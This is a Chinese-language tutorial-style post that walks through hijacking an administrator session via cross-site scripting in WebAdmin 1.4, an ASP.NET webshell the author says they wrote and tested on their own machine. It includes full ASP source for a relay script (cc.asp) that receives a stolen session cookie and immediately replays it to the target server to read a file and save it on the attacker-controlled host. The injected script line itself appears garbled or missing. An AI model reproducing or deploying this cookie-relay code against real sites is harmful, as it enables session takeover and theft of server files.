还是以ASP为例，ASP程序是如何得到客户端Session的呢？通过抓包可以发现HTTP请求的Cookie字段有个ASPSESSIONIDXXXXXXXX（X是随机的字母）值，ASP程序就是通过这个值判断Session的。如果我们得到管理员的ASPSESSIONIDXXXXXXXX及其值，并在这次会话结束之前提交到服务器，那么我们的身份就是管理员啦！

那怎么得到Session呢？答案是跨站。因为javascript的documents.cookie()方法会把Cookie读出来，当然也包括会话型Cookie。

如果你关注Web安全，相信你一定看到过记录跨站得到Cookie的脚本程序，我们也需要一个类似的程序，但功能不是记录，而是立即转发（因为当前会话随时可能由于管理员退出而失效）。这个程序可以用ASP、PHP、Perl甚至C来实现，我还是用ASP吧J

要写这个程序，你还必须对要攻击的程序相当了解，因为你要提交各种请求。那现在先看看本例中被跨站的程序吧。

很荣幸，我选中了WebAdmin 1.4，嘿嘿，自己写的程序自己肯定最清楚哪里有漏洞啊。呵呵，简要介绍一下，WebAdmin是一个ASP.Net下的webshell，使用的Session认证方式，1.4版本的跨站存在于目录浏览的URL。

所以我就在src中构造这样的路径：“E: ”。这段代码就是把当前cookie作为参数提交给www.target.org/test/cc.asp文件。

cc.asp文件内容如下：

<%
'only for test with CSS
str = request("a")
Set xPost = CreateObject("Msxml2.ServerXMLHTTP")
xPost.Open "GET", "http://222.210.115.*:813/
webadmin.aspx?action=edit&src=E:\MyWeb\webadmin.aspx", False
xPost.setRequestHeader "Cookie",str
xPost.Send()
         Set sGet = CreateObject("ADODB.Stream")
         sGet.Mode = 3
         sGet.Type = 1
         sGet.Open()
         sGet.Write(xPost.responseBody)
         sGet.SaveToFile Server.MapPath("a.txt"),2
         set sGet = nothing
Set xPOST=nothing
%>

该文件目的是获取管理员Session并利用WebAdmin的文件编辑功能查看222.210.115.*（被攻击的Web服务器，其实是我本机啦）的E:\MyWeb\webadmin.aspx文件内容并把内容保存到本地的a.txt文件中。数据的提交使用的是ServerXMLHTTP组件，它与XMLHTTP有相似之处，也有异同，具体的可以看看《ServerXMLHTTP vs XMLHTTP》。

准备就绪，先登陆WebAdmin然后再访问构造好的跨站URL，呵呵，然后去看http://www.target.org/test/a.txt。

你也可以试试直接访问cc.asp，呵呵，生成的a.txt将是一个登陆界面的源文件。

哈哈，现在热烈庆祝一下本次HTTP会话劫持测试胜利闭幕，总的来说实行一次这样的攻击难度还是很大的，不过话又说回来，在技术这块领域，除了Copy人家的代码，还有不需要努力就能做好的事情吗？